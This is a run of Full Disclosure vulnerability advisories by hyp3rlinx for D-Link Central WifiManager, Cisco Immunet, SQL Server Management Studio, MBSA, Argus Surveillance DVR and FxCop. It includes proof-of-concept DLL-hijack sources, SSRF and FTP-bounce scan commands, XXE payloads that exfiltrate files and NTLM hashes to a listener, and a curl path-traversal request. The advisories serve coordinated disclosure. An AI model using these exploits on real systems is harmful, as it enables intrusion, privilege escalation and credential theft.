[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Link’s free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] Trojan File SYSTEM Privilege Escalation [Affected Component] "quserex.dll" [CVE Reference] CVE-2018-15515 [Security Issue] D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan horse "quserex.dll" and will create a new thread running with SYSTEM integrity. [Impact] Code Execution as SYSTEM [Exploit/POC] 1) Create 32bit DLL named "quserex.dll" and place in "CaptivelPortal.exe" directory under the DLINK directory 2) Restart the service "CaptivelPortal" 3) Proof, examine using process monitor (sysinternals) #include /* hyp3rlinx */ /* gcc -c -m32 quserex.c gcc -shared -m32 -o quserex.dll quserex.o */ void executo(){ MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK); } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch(fdwReason){ case DLL_PROCESS_ATTACH:{ executo(); break; } case DLL_PROCESS_DETACH:{ executo(); break; } case DLL_THREAD_ATTACH:{ executo(); break; } case DLL_THREAD_DETACH:{ executo(); break; } } return TRUE; } [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R&D has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-15517 / D-LINK Central WifiManager CWM-100 / Server Side Request Forgery
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SERVER-SIDE-REQUEST-FORGERY.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Link’s free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] Server Side Request Forgery [Affected Component] MailConnect [CVE Reference] CVE-2018-15517 [Security Issue] Using a web browser or script SSRF can be initiated against internal/external systems to conduct port scans by leveraging D-LINKs MailConnect component. The MailConnect feature on D-Link Central WiFiManager CWM-100 1.03 r0098 devices is intended to check a connection to an SMTP server but actually allows outbound TCP to any port on any IP address, leading to SSRF, as demonstrated by an index.php/System/MailConnect/host/ 127.0.0.1/port/22/secure/ URI. This can undermine accountability of where scan or connections actually came from and or bypass the FW etc. This can be automated via script or using Web Browser. [Exploit/POC] https://VICTIM-IP/index.php/System/MailConnect/host/port/secure/ reply: OK Scan internal port 22 SSH: https://VICTIM-IP/index.php/System/MailConnect/host/VICTIM-IP/port/22/secure/ reply: OK [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R&D has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-15516 / D- LINK Central WifiManager CWM-100 / FTP Server PORT Bounce Scan
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-FTP-SERVER-PORT-BOUNCE-SCAN.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] us.dlink.com [Product] D-LINK Central WifiManager (CWM 100) Version 1.03 r0098 http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/ D-Link’s free Central WiFiManager is a web-based wireless Access Point management tool, enabling you to create and manage multi-site, multi-tenancy wireless networks. [Vulnerability Type] FTP Server PORT Bounce Scan [CVE Reference] CVE-2018-15516 [Security Issue] The FTP Server component of the D-LINK Central WifiManager can be used as a man-in-the-middle machine allowing PORT Command bounce scan attacks. This vulnerability allows remote attackers to abuse your network and discreetly conduct network port scanning. Victims will then think these scans are originating from the D-LINK network running the afflicted FTP Server and not you. [Exploit/POC] D-LINK CWM-100 FTP Server listens on port 9000 (default), default creds are "admin" "admin" nmap -v -b admin:admin@VICTIM-IP:9000 -p 21,22,23,53,445 [POC Video URL] https://vimeo.com/299797225 [Network Access] Remote [Severity] Medium [Disclosure Timeline] Vendor Notification: August 8, 2018 Vendor acknowledgement: August 8, 2018 CVE assigned Mitre: August 18, 2018 Request update: August 31, 2018 No reply from vendor Request update: September 6, 2018 Vendor: "R&D has begun this month to patch your report." : September 12, 2018 Request update: October 3, 2018 Vendor: "will release a new beta for QA verification by end of this month 10'2018." Request update: October 16, 2018 no reply from vendor Request update: October 23, 2018 Vendor: "It still is schedule to be released by the 31st." : October 23, 2018 Inform vendor of disclosure by November 8, 2018 : October 31, 2018 No reply from vendor November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-15437 / Cisco Immunet and Cisco AMP for Endpoints / System Scan Denial of Service
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/CISCO-IMMUNET-AND-CISCO-AMP-FOR-ENDPOINTS-SYSTEM-SCAN-DENIAL-OF-SERVICE.txt [+] ISR: ApparitionSec ***Greetz: indoushka | Eduardo B.*** [Vendor] www.cisco.com [Multiple Products] Cisco Immunet < v6.2.0 and Cisco AMP For Endpoints v6.2.0 Cisco Immunet is a free, cloud-based, community-driven antivirus application, using the ClamAV and its own engine. The software is complementary with existing antivirus software. Cisco AMP (Advanced Malware Protection) Advanced Malware Protection (AMP) goes beyond point-in-time capabilities and is built to protect organizations before, during, and after an attack. [Vulnerability Type] System Scan Denial of Service [CVE Reference] CVE-2018-15437 Cisco Advisory ID: cisco-sa-20181107-imm-dos Cisco Bug ID: CSCvk70945 Cisco Bug ID: CSCvn05551 CVSS Score: Base 5.5 CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:X/RL:X/RC:X [Security Issue] A vulnerability in the system scanning component of Cisco Immunet and Cisco Advanced Malware Protection (AMP) for Endpoints running on Microsoft Windows could allow a local attacker to disable the scanning functionality of the product. This could allow executable files to be launched on the system without being analyzed for threats. The vulnerability is due to improper process resource handling. An attacker could exploit this vulnerability by gaining local access to a system running Microsoft Windows and protected by Cisco Immunet or Cisco AMP for Endpoints and executing a malicious file. A successful exploit could allow the attacker to prevent the scanning services from functioning properly and ultimately prevent the system from being protected from further intrusion. There are no workarounds that address this vulnerability. Issue is due to a NULL DACL (RW Everyone) resulting in a system scan Denial Of Service vulnerability for both of these endpoint protection programs. The affected end user will get pop up warning box when attempting to perform a file or system scan, "You Can Not Scan at This Time "The Immunet service is not running. Please restart the service and retry." Below I provide details to exploit Cisco Immunet, however "Cisco AMP For Endpoints" is also affected so the exploit can easily be ported. [References] https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181107-imm-dos [Vulnerability Details] Pipe is Remote Accessible PIPE_REJECT_REMOTE_CLIENTS not present. FILE_FLAG_FIRST_PIPE_INSTANCE not present. Max Pipe Instances = FF (255) loc_140028140: lea rax, [rbp+57h+pSecurityDescriptor] mov [rbp+57h+SecurityAttributes.nLength], 18h mov edx, 1 ; dwRevision mov [rbp+57h+SecurityAttributes.lpSecurityDescriptor], rax lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor mov [rbp+57h+SecurityAttributes.bInheritHandle], 1 callcs:InitializeSecurityDescriptor xor r9d, r9d; bDaclDefaulted lea rcx, [rbp+57h+pSecurityDescriptor] ; pSecurityDescriptor xor r8d, r8d; pDacl lea edx, [r9+1] ; bDaclPresent callcs:SetSecurityDescriptorDacl mov rcx, [rdi+18h] ; lpName lea rax, [rbp+57h+SecurityAttributes] mov [rsp+100h+lpSecurityAttributes], rax ; lpSecurityAttributes mov edx, 4003h ; dwOpenMode mov [rsp+100h+nDefaultTimeOut], esi ; nDefaultTimeOut mov r9d, 0FFh ; nMaxInstances mov [rsp+100h+nInBufferSize], 2000h ; nInBufferSize mov r8d, 6 ; dwPipeMode mov [rsp+100h+nOutBufferSize], 2000h ; nOutBufferSize callcs:CreateNamedPipeW mov [rdi+8], rax callcs:GetLastError testeax, eax jz short loc_140028203 [Exploit/POC] "Cisco-Immunet-Exploit.c" #include #define pipename "\\\\.\\pipe\\IMMUNET_SCAN" /* Discovered by hyp3rlinx CVE-2018-15437 */ int main(void) { while (TRUE){ HANDLE pipe = CreateNamedPipe(pipename, PIPE_ACCESS_INBOUND | PIPE_ACCESS_OUTBOUND , PIPE_WAIT, 1, 1024, 1024, 120 * 1000, NULL); if (pipe == INVALID_HANDLE_VALUE){ printf("Error: %d", GetLastError()); }else{ printf("%s","pipe created\n"); printf("%x",pipe); } ConnectNamedPipe(pipe, NULL); if(ImpersonateNamedPipeClient(pipe)){ printf("ok!"); }else{ printf("%s%d","WTF",GetLastError()); } CloseHandle(pipe); } return 0; } [Network Access] Local / Remote [Severity] High Disclosure Timeline = Vendor Notification: August 7, 2018 Vendor acknowledgement: August 7, 2018 Vendor released fixes: November 7th, 2018 November 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is&qu
[FD] CVE-2018-8533 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / REGSRVR file handling XML Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-REGSRVR-FILES-XML-INJECTION-CVE-2018-8533.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] SQL Server Management Studio 17.9 SQL Server Management Studio 18.0 (Preview 4) SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server. [Vulnerability Type] XML External Entity Injection [CVE Reference] CVE-2018-8533 [Security Issue] This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of REGSRVR files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "POC.xml" http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send; 3) "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; Result: Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - [References] https://www.zerodayinitiative.com/advisories/ZDI-18-1133/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8533 [Network Access] Remote [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program Vendor reply: Release of advisory patch Tuesday : October 9, 2018 October 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-8527 Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / xel filetype XML Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XEL-FILETYPE-XML-INJECTION-CVE-2018-8527.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] SQL Server Management Studio 17.9 SQL Server Management Studio 18.0 (Preview 4) SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server. [Vulnerability Type] XML External Entity Injection [CVE Reference] CVE-2018-8527 [Security Issue] This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XEL files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. [References] https://www.zerodayinitiative.com/advisories/ZDI-18-1131/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8527 [Exploit/POC] python -m SimpleHTTPServer (listens Port 8000) "evil.xel" (Extended Event Log File) http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send; "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; OR Steal NTLM hashes Kali linux /usr/share/responder/tools responder -I eth0 -rv "evil.xel" %dtd;]> Result: Forced authentication and NTLM hash captured [Network Access] Remote Notification: Trend Micro Zero Day Initiative Program Vendor reply: Release of advisory patch Tuesday : October 9, 2018 October 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] CVE-2018-8532 / Microsoft SQL Server Management Studio 17.9 / 18.0 Preview 4 / XML Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-SQL-SERVER-MGMT-STUDIO-XMLA-FILETYPE-XML-INJECTION-CVE-2018-8532.txt [+] ISR: ApparitionSec [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] SQL Server Management Studio 17.9 SQL Server Management Studio 18.0 (Preview 4) SQL Server Management Studio is a software application first launched with Microsoft SQL Server 2005 that is used for configuring, managing, and administering all components within Microsoft SQL Server. The tool includes both script editors and graphical tools which work with objects and features of the server. [Vulnerability Type] XML External Entity Injection [CVE Reference] CVE-2018-8532 [Security Issue] This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Microsoft SQL Server Management Studio. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of XMLA files. Due to the improper restriction of XML External Entity (XXE) references, a specially crafted document specifying a URI causes the XML parser to access the URI and embed the contents back into the XML document for further processing. An attacker can leverage this vulnerability to disclose information in the context of the current process. [Exploit/POC] 1) python -m SimpleHTTPServer 2) "test.xmla" http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send; 3) "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; Result: Serving HTTP on 0.0.0.0 port 8000 ... 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /payload.dtd HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - 127.0.0.1 - - [08/Apr/2018 00:42:37] "GET /?;%20for%2016-bit%20app%20support%0D%0A[386Enh]%0D%0Awoafont=dosapp.fon%0D%0AEGA80WOA.FON=EGA80WOA.FON%0D%0AEGA40WOA.FON=EGA40WOA.FON%0D%0ACGA80WOA.FON=CGA80WOA.FON%0D%0ACGA40WOA.FON=CGA40WOA.FON%0D%0A%0D%0A[drivers]%0D%0Awave=mmdrv.dll%0D%0Atimer=timer.drv%0D%0A%0D%0A[mci] HTTP/1.1" 200 - [References] https://www.zerodayinitiative.com/advisories/ZDI-18-1132/ https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8532 [Network Access] Remote [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program Vendor reply: Release of advisory patch Tuesday : October 9, 2018 October 10, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] ZDI-CAN-6307 / Microsoft Baseline Security Analyzer v2.3 / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt [+] ISR: Apparition Security [+] Zero Day Initiative Program [Vendor] www.microsoft.com [Product] Microsoft Baseline Security Analyzer v2.3 Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings. [Vulnerability Type] XML External Entity Injection [ZDI Reference] ZDI-CAN-6307 [Security Issue] Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker controlled server if a user opens a specially crafted ".mbsa" file. [Exploit/POC] Install MBSA https://www.microsoft.com/en-us/download/details.aspx?id=7558 1) "evil.mbsa" http://127.0.0.1:8000/payload.dtd";> %dtd;]> &send; 2) "payload.dtd" http://127.0.0.1:8000?%file;'>"> %all; When victim attempts open file they get prompted "Do you want to let this app make changes to your device?" However, it also indicates it is a "verified publisher" namely Microsoft. After opening the local users files can be exfiltrated to a remote server. Moreover, we can use this to steal NTLM hashes. Using Forced Authentication to steal NTLM hashes 2) msf > use auxiliary/server/capture/smb msf auxiliary(smb) > exploit -j "evil.mbsa" %dtd;]> Result: credentials captured by remote sever [Network Access] Remote [Severity] High [Disclosure Timeline] Notification: Trend Micro Zero Day Initiative Program Vendor reply: Program deprecated September 8, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Argus Surveillance DVR - 4.0.0.0 / Unauthenticated Directory Traversal File Disclosure
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-UNAUTHENTICATED-PATH-TRAVERSAL-FILE-DISCLOSURE.txt [+] ISR: Apparition Security Greetz: ***Greetz: indoushka | Eduardo | GGA*** [Vendor] www.argussurveillance.com [Product] Argus Surveillance DVR - 4.0.0.0 Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site. When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video. This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control. [Vulnerability Type] Directory Traversal [CVE Reference] CVE-2018-15745 [Security Issue] Argus Surveillance DVR 4.0.0.0 devices allow Unauthenticated Directory Traversal, leading to File Disclosure via a ..%2F in the WEBACCOUNT.CGI RESULTPAGE parameter. [Affected Component] WEBACCOUNT.CGI RESULTPAGE parameter [Exploit/POC] curl " http://VICTIM-IP:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD= " ; for 16-bit app support woafont=dosapp.fon EGA80WOA.FON=EGA80WOA.FON EGA40WOA.FON=EGA40WOA.FON CGA80WOA.FON=CGA80WOA.FON CGA40WOA.FON=CGA40WOA.FON wave=mmdrv.dll timer=timer.drv [Video POC URL] https://vimeo.com/287115273 [Network Access] Remote [Severity] High [Disclosure Timeline] Vendor Notification: August 17, 2018 Second attempt: August 21, 2018 CVE Assigned Mitre: August 23, 2018 August 28, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Argus Surveillance DVR - 4.0.0.0 / SYSTEM Privilege Escalation
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/ARGUS-SURVEILLANCE-DVR-v4-SYSTEM-PRIVILEGE-ESCALATION.txt [+] ISR: ApparitionSec Greetz: ***Greetz: indoushka | Eduardo | GGA*** [Vendor] www.argussurveillance.com [Product] Argus Surveillance DVR - 4.0.0.0 Our DVR software provides scheduled, continuous or activated upon motion detection video recording. You can monitor unlimited number of cameras, through Internet or on-site. When our surveillance software detects motion in the monitored area, it sounds alarm, e-mails captured images, or records video. This is security surveillance IP camera software. It has features to place image overlays and date/time stamps, adjust picture size / quality, and Pan/Tilt/Zoom control. [Vulnerability Type] SYSTEM Privilege Escalation [CVE Reference] N/A [Security Issue] Argus Surveillance DVR 4.0.0.0 devices allow Trojan File SYSTEM Privilege Escalation. Placing a Trojan File DLL named "gsm_codec.dll" in Argus application directory will lead to arbitrary code execution with SYSTEM integrity. [Affected Component] DVRWatchdog.exe [Exploit/POC] create DLL 32bit DLL named "gsm_codec.dll" and place in App Dir, launch Argus DVR tada! your now SYSTEM. #include /* hyp3rlinx */ /* gcc -c -m32 gsm_codec.c gcc -shared -m32 -o gsm_codec.dll gsm_codec.o */ void systemo(){ MessageBox( 0, "3c184981367094fce3ab70efc3b44583" , "philbin :)" , MB_YESNO + MB_ICONQUESTION ); } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved){ switch(fdwReason){ case DLL_PROCESS_ATTACH:{ systemo(); break; } case DLL_PROCESS_DETACH:{ systemo(); break; } case DLL_THREAD_ATTACH:{ systemo(); break; } case DLL_THREAD_DETACH:{ systemo(); break; } } return TRUE; } [Video POC URL] https://vimeo.com/287115698 [Network Access] Local [Severity] High [Disclosure Timeline] Vendor Notification: August 17, 2018 Second attempt: August 21, 2018 CVE Assigned Mitre: August 23, 2018 August 28, 2018 : Public Disclosure [+] Disclaimer The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Microsoft Windows "FxCop" v10-12 / XML External Entity Injection
[+] Credits: hyp3rlinx [+] Website: hyp3rlinx.altervista.org [+] Source: http://hyp3rlinx.altervista.org/advisories/MS-WINDOWS-FXCOP-XML-EXTERNAL-ENTITY-INJECTION.txt [+] ISR: Apparition Security ***Greetz: indoushka|Eduardo|Dirty0tis*** Vendor: www.microsoft.com Product: === Microsoft Windows "FxCop" v10-12 Vulnerability Type: === XML External Entity CVE Reference: == N/A Security Issue: FxCop is vulnerable to XML injection attacks allowing local file exfiltration and or NTLM hash theft. Tested in Windows 7 and Windows 10 download SDK it works in both. If you have the the particular SDK in question it is probably there but needs to be installed as it was for me. MSRC Response: = "We’ve determined that the issue was fixed in FxCop 14.0, but that it repros in versions earlier than that (e.g. 10.0 -12.0 as far as SDKs are concerned, with version 13.0 skipped). We have confirmation that the SDKs for Win8+ don’t ship FxCop We are going to pull Win7 SDKs containing v10-v12 of FxCop. Dissecting SDKs and replacing the tool in situ is fraught with peril, and chaining in a later FxCop to 